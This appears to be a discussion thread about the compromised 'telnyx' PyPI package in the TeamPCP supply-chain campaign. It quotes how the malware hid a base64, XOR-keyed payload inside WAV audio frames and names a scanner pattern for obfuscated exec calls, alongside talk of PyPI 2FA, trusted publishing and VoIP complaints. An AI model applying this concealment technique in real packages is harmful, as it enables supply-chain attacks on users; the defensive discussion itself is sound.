Maybe second to that, Zig is interesting as although I see people using libraries, its on a much lower level compared to rust/node/python.
Sadly, rust suffers from the same dependency issue like node/python.
Wanting a better pip means I am unsafe?
Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.
> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.
Talk about burying the lede.
More generally speaking one would have to treat the computer/container/VM as compromised. User-level malware still sucks. We've seen just the other day that Python code can run at startup time with .pth files (and probably many other ways). With a source distribution, it can run at install time, too (see e.g. https://zahlman.github.io/posts/python-packaging-3/).
> What to Do If Affected
> Downgrade immediately:
> pip install telnyx==4.87.0
Even if only the "environment" were compromised, that includes pip in the standard workflow. You can use an external copy of pip instead, via the `--python` option (and also avoid duplicating pip in each venv, wasting 10-15MB each time, by passing `--without-pip` at creation). I touch on both of these in https://zahlman.github.io/posts/python-packaging-2/ (specifically, showing how to do it with Pipx's vendored copy of pip). Note that `--python` is a hack that re-launches pip using the target environment; pip won't try to import things from that environment, but you'd still be exposed to .pth file risks.
The packages are quarantined by PyPi
Follow the overall incident: https://ramimac.me/teampcp/#phase-10
Aikido/Charlie with a very quick blog: https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-...
ReversingLabs, JFrog also made parallel reports
The blast radius of TeamPCP just keeps on increasing...
Is there any way to setup PyPI to only publish packages that come from a certain pattern of tag that exists in GH? Would such a measure help at all here?
On debian, all builds happen without internet access. So whatever ends up on the .deb file is either contained on the dependencies or in the orig tarball.
Is anything similar done for builds that create artifacts for pypi, so that a certain correspondence between binary file and sources exists? Or is there unrestricted internet access so that what actually ends up on pypi can come from anywhere and vetting the sources is of little help?
(If I wanted to taxonomize these things, I say that the Debian model is effectively a pinky promise that the source artifacts correspond to the built product, except that it’s a better pinky promise because it’s one-to-many instead of many-to-many like language package managers generally are. You can then formalize that pinky promise with keys and signatures, but at the end of the day you’re still essentially binding a promise.)
No ... I tried hard. But still get a timeout.
[1]: https://github.com/pypa/advisory-database/blob/main/vulns/te...
[2]: https://osv.dev/vulnerability/MAL-2026-2254
Am I being too nitpicky to say that that is part of your infrastructure?
Doesn't 2FA stop this attack in its tracks? PyPI supports 2FA, no?
Yeah it means you don’t get zero click releases. Maybe boto gets special treatment
I also wrote the twine manpage (in debian) because at the time there was even no way of knowing how to publish at all.
Basically you enable 2FA on your account, go on the website, generate a token, store it in a .txt file and use that for the rest of your life without having to use 2FA ever again.
I had originally thought you'd need your 2FA every upload but that's not how it works.
Then they have the trusted publisher thing (which doesn't and won't work with codeberg) where they just upload whatever comes from github's runners. Of course if the developer's token.txt got compromised, there's a chance also his private ssh key to push on github got compromised and the attackers can push something that will end up on pypi anyway.
Remember that trusted publishing replaces GPG signatures, so the one thing that required unlocking the private key with a passphrase is no longer used.
python.org has also stopped signing their releases with GPG in favour to sigstore, which is another 3rd party signing scheme somewhat similar to trusted publisher.
edit: They deny this but my suspicion is that eventually tokens won't be supported and trusted publishing will be the only way to publish on pypi, locking projects out of using codeberg and whatever other non-major forge they might wish to use.
> Then they have the trusted publisher thing (which doesn't and won't work with codeberg) where they just upload whatever comes from github's runners.
There’s no particular reason it wouldn’t work; it’s just OIDC and Codeberg could easily stand up an IdP. If you’re willing to put the effort into making this happen, I’d be happy (as I’ve said before) to review any contributions towards this end.
(The only thing that won’t work here is imputing malicious intent; that makes it seem like you have a score to settle rather than a genuine technical interest in the community.)
It didn't look to me like codeberg was being seriously considered for inclusion.
[1]: https://discuss.python.org/t/new-oidc-providers-for-trusted-...
Support wasn't helpful.
Went with Twilio instead.
But it is ironic that now Telnyx brand itself as an AI company but they couldn't detect that I am just calling some family once in a while and not involved in massive spam campaign.
The only one who kept me around was voip.ms but it literally doesn't work.
I am still looking for a decent VoIP provider to simply make calls.
> We've reviewed the details you provided and updated your case with the necessary information. It is now being routed to the appropriate team for further support.
That was July 2025!
On GitHub see my fork runvnc/PySIP. Please let me know if you know if something better for python that is not copy left or rely on some copy left or big external dependency. I was using baresip but it was a pain to integrate and configure with python.
Anyway, after fixing a lot in the original PySIP my version works with Telynx. Not tested on other SIP providers.
Never really thought too much about the security implications but that is of course a benefit too.
Main reasoning for us has been to aim for a really nice HTTP API rather than hide uglyness with an SDK on top.
Ended up sticking a twilio endpoint in the ring group with a "press 1 to accept this call" message so it wouldn't eat the call, then was able to fire an http request with the call details.
It worked well, although I admit I was a little annoyed I couldn't do it directly with VoIP.ms.
Every time I wanted to call a number in Europe I had to contact their support and go through "can you try now and see if works?" several time.
After 3 months I had enough of it and asked to have my provisioned credit reimbursed but they just refused.
> An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.
Agreed, that's why a lot of packaging ecosystems (including PyPI) have moved towards schemes that involve self-scoping, self-expiring tokens. The CI can still publish, but the attacker can no longer exfiltrate the publishing credential and use it indefinitely later.
(These schemes are not mandatory, because they can't be.)
Does the package have a user base, or did the malicious team target one of the many useless GitHub repos?
That's incorrect, the repo and package date back to 2019
Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward comparability and version control, when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure.
I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good.
It's not even the language itself, not that it doesn't have its own issues, or the inefficient way it's executed, but the ecosystem around it is so made out of technical debt.
uv taking over basically ensures that dependencies won't become managed properly and nothing will work without uv
It's a pandemic, I will be hardening my security, and rotating my keys just in case.
venv and Docker don't fix much. They just freeze the mess until rebuild day, when you find out half the stack depended on an old wheel, a dead maintainer, or a C extension that no longer compiles on a current Python.
It's the closest language to pseudocode that exists.
Like every other language from 1991, it has rough edges.
[1] https://xkcd.com/353/
Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.
My understanding though is most corporations that take security seriously either build everything themselves in a sandbox, or use something like JFrog's Artifactory with various security checks, and don't let users directly connect to public indexes. So I'm not sure what the market is.